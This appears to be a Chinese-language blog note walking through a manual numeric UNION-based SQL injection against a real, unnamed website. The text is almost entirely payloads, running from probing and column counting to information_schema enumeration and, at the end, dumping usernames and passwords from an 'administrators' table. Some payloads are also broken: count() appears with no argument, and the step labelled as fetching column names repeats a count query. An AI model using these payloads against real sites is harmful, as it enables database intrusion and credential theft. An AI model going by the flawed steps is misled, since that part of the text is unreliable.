記手工SQL數字回顯型注入

前言

已經檢測出該網站有sql注入問題，試著手工注入網站，順便再復習一下。

正文

1.先通過引號 判斷該網站為數字型，payload直接拼接，無需引號閉合，當網站后直接構造拼接 and 0# 網站文章列表內容受到影響顯示空白，此為回顯類型注入

payload：and 0#

2.進行字段數的猜解，確定回顯位

字段數猜解通過payload：ORDER BY X # 對X字段進行回顯字段值猜解，此網站X=6時，網站顯示正常則確定回顯字段數為6

構造payload:UNION SELECT 1,2,3,4,5,6# 確定回顯位為2,6選擇其一即可

確定回顯位:payload:UNION SELECT 1,2,3,4,5,6#

3.進網站進行信息收集payload:UNION SELECT 1,database(),3,4,5,6# 對第二位字段進行函數替換可收集網站數據庫相關信息如：version() 數據庫版本信息 @@basedirmysql安裝路徑等

4.獲取表數量，通過上一步得到mysql數據庫版本大于5.1，可以通過MySQL的information_schema數據庫進行數據獲取

payload:UNION SELECT 1,count(),3,4,5,6 FROM information_schema.tables WHERE table_schema=database() #

5.獲取表名

payload:UNION SELECT 1,GROUP_CONCAT(table_name),3,4,5,6 FROM information_schema.tables WHERE table_schema=database() #

6.獲取數據庫表字段數

payload:UNION SELECT 1,count(),3,4,5,6 FROM information_schema.columns WHERE table_schema=database() and table_name='administrators' #

7.獲取數據庫表字段名

payload:UNION SELECT 1,count(*),3,4,5,6 FROM information_schema.columns WHERE table_schema=database() and table_name='administrators' #

8.獲取表數據

payload:UNION SELECT 1,group_concat(concat(id,name,password)),3,4,5,6 FROM administrators LIMIT 0,1 #

說明

以mysql數據庫，數字回顯類型進行sql手工注入流程，僅供參考